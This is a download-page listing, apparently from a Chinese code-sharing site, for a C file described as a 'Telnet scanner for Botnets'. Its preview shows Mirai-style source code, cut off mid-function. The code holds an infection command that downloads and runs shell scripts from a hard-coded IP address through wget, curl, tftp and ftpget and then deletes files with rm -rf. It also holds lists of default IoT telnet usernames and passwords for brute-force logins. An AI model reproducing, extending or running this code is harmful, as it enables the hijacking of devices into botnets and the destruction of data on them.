• theloganb
    了解作者
  • C/C++
    开发工具
  • 5KB
    文件大小
  • zip
    文件格式
  • 0
    收藏次数
  • 1 积分
    下载积分
  • 0
    下载次数
  • 2020-08-12 09:38
    上传日期
Telnet scanner for Botnets
telnet.zip
  • telnet.c
    24.9KB
内容介绍
#include <stdarg.h> #include <errno.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <fcntl.h> #include <strings.h> #include <string.h> #include <unistd.h> #include <dirent.h> #include <poll.h> #include <netdb.h> #include <time.h> #include <net/if.h> #include <sys/wait.h> #include <sys/time.h> #include <sys/ioctl.h> #include <arpa/inet.h rel='nofollow' onclick='return false;'> #include <sys/socket.h> #include <netinet/ip.h> #include <netinet/in.h> #include <netinet/tcp.h> #include <netinet/udp.h> #include <resolv.h> #define MAX_PACKET_SIZE 1024 #define PHI 0x9e3779b9 //telnet scanner stuff #define BUFFER_SIZE 1024 #define CMD_IAC 255 #define CMD_WILL 251 #define CMD_WONT 252 #define CMD_DO 253 #define CMD_DONT 254 #define PAD_RIGHT 1 #define PAD_ZERO 2 #define PRINT_BUF_LEN 12 #define OPT_SGA 3 #define SOCKBUF_SIZE 1024 // Telnet scanner payload, must end with \r\n\0 char *rekdevice = "cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://13.85.152.27/Razor.sh; curl -O http://13.85.152.27/Razor.sh; chmod 777 Razor.sh; sh Razor.sh; tftp 13.85.152.27 -c get Razor.sh; chmod 777 Razor.sh; sh Razor.sh; tftp -r Razor2.sh -g 13.85.152.27; chmod 777 Razor2.sh; sh Razor2.sh; ftpget -v -u anonymous -p anonymous -P 21 13.85.152.27 Razor1.sh Razor1.sh; sh Razor1.sh; rm -rf Razor.sh Razor.sh Razor2.sh Razor1.sh; rm -rf *\r\n\0"; char *usernames[] = { "\0", "root\0", "root\0", "root\0", "root\0", "root\0", "root\0", "root\0", "root\0", "root\0", "root\0", "root\0", "root\0", "root\0", "root\0", "root\0", "root\0", "root\0", "root\0", "root\0", "root\0", "root\0", "root\0", "root\0", "root\0", "root\0", "root\0", "root\0", "root\0", "admin\0", "admin\0", "admin\0", "admin\0", "admin\0", "admin\0", "admin\0", "admin\0", "admin\0", "admin\0", "admin\0", "admin\0", "admin\0", "admin\0", "admin\0", "admin\0", "admin\0", "admin\0", "admin\0", "admin\0", "admin\0", "guest\0", "guest\0", "guest\0", "guest\0", "guest\0", "guest\0", "guest\0", "root\0", "admin\0", "root\0", "default\0", "user\0", "guest\0", "daemon\0", "admin\0", "admin\0", "root\0", "admin\0", "adm\0", "guest\0", "root\0", "root\0", "telnet\0", "root\0", "admin\0", "admin\0", "Administrator\0", "root\0", "mg3500\0", "admin\0", "admin\0", "admin\0", "admin\0", "admin\0", "admin\0", "default\0", "admin\0", "admin\0", "admin\0", "root\0", "root\0", "root\0", "root\0", "admin1\0", "ubnt\0", "support\0", "root\0", "user\0", "guest\0" }; char *passwords[] = { "\0", "root\0", "password\0", "\0", "Zte521\0", "vizxv\0", "000000\0", "14567\0", "hi3518\0", "user\0", "pass\0", "admin14\0", "7ujMko0admin\0", "00000000\0", "<>\0", "klv1\0", "klv14\0", "oelinux1\0", "realtek\0", "1111\0", "54321\0", "antslq\0", "zte9x15\0", "system\0", "1456\0", "888888\0", "ikwb\0", "default\0", "juantech\0", "xc3511\0", "support\0", "1111111\0", "service\0", "145\0", "4321\0", "tech\0", "<>\0", "abc1\0", "7ujMko0admin\0", "switch\0", "admin14\0", "\0", "1111\0", "meinsm\0", "pass\0", "smcadmin\0", "14567890\0", "14\0", "admin1\0", "password\0", "admin\0", "anko\0", "xc3511\0", "1456\0", "\0", "guest\0", "145\0", "xc3511\0", "admin\0", "Zte521\0", "\0", "user\0", "guest\0", "\0", "password\0", "admin1\0", "ikwb\0", "14567890\0", "\0", "\0", "1456\0", "root\0", "telnet\0", "zte9x15\0", "meinsm\0", "\0", "\0", "antslq\0", "merlin\0", "switch\0", "7ujMko0admin\0", "abc1\0", "<>\0", "tech\0", "4321\0", "default\0", "145\0", "service\0", "1111111\0", "admin14\0", "pass\0", "user\0", "hi3518\0", "password\0", "ubnt\0", "zlxx.\0", "14567\0", "000000\0" }; char *advances[] = { ":", "ser", "ogin", "name", "pass", "dvrdvs", (char *) 0 }; char *fails[] = { "nvalid", "ailed", "ncorrect", "enied", "error", "goodbye", "bad", "timeout", (char *) 0 }; char *successes[] = { "$", "#", ">", "@", "shell", "dvrdvs", "usybox", (char *) 0 }; char *advances2[] = { ":", "nvalid", "ailed", "ncorrect", "enied", "rror", "oodbye", "bad", "busybox", "$", "#", (char *) 0 }; char *legit[] = { "AK47", (char *) 0 }; char *infected[] = { "CAPSAICIN", (char *) 0 }; int scanPid = 0; struct telstate_t { int fd; unsigned int ip; unsigned char state; unsigned char complete; unsigned char usernameInd; /* username */ unsigned char passwordInd; /* password */ unsigned int totalTimeout; /* totalTimeout */ char *sockbuf; }; struct ipstate_t { int fd; unsigned int ip; unsigned char state; unsigned char complete; unsigned char usernameInd; unsigned char passwordInd; unsigned int totalTimeout; unsigned int telPort; char *sockbuf; }; static uint32_t Q[4096], c = 362436; void init_rand(uint32_t x) { int i; Q[0] = x; Q[1] = x + PHI; Q[2] = x + PHI + PHI; for (i = 3; i < 4096; i++) Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i; } uint32_t rand_cmwc(void) { uint64_t t, a = 18782LL; static uint32_t i = 4095; uint32_t x, r = 0xfffffffe; i = (i + 1)&4095; t = a * Q[i] + c; c = (t >> 32); x = t + c; if(x < c) { x++; c++; } return (Q[i] = r - x); } static void printchar(unsigned char ** str, int c) { if (str) { ** str = c; ++( * str); } else(void) write(1,&c, 1); } static int prints(unsigned char ** out, const unsigned char *string, int width, int pad) { register int pc = 0, padchar = ' '; if (width > 0) { register int len = 0; register const unsigned char *ptr; for (ptr = string;* ptr; ++ptr) ++len; if (len >= width) width = 0; else width -= len; if (pad&PAD_ZERO) padchar = '0'; } if (!(pad&PAD_RIGHT)) { for (; width > 0; --width) { printchar(out, padchar); ++pc; } } for (;* string; ++string) { printchar(out, * string); ++pc; } for (; width > 0; --width) { printchar(out, padchar); ++pc; } return pc; } static int printi(unsigned char ** out, int i, int b, int sg, int width, int pad, int letbase) { unsigned char print_buf[PRINT_BUF_LEN]; register unsigned char *s; register int t, neg = 0, pc = 0; register unsigned int u = i; if (i == 0) { print_buf[0] = '0'; print_buf[1] = '\0'; return prints(out, print_buf, width, pad); } if (sg && b == 10 && i < 0) { neg = 1; u = -i; } s = print_buf + PRINT_BUF_LEN - 1; * s = '\0'; while (u) { t = u % b; if (t >= 10) t += letbase - '0' - 10; *--s = t + '0'; u /= b; } if (neg) { if (width && (pad&PAD_ZERO)) { printchar(out, '-'); ++pc; --width; } else { *--s = '-'; } } return pc + prints(out, s, width, pad); } static int print(unsigned char ** out, const unsigned char *format, va_list args) { register int width, pad; register int pc = 0; unsigned char scr[2]; for (;* format != 0; ++format) { if ( * format == '%') { ++fo
评论
    相关推荐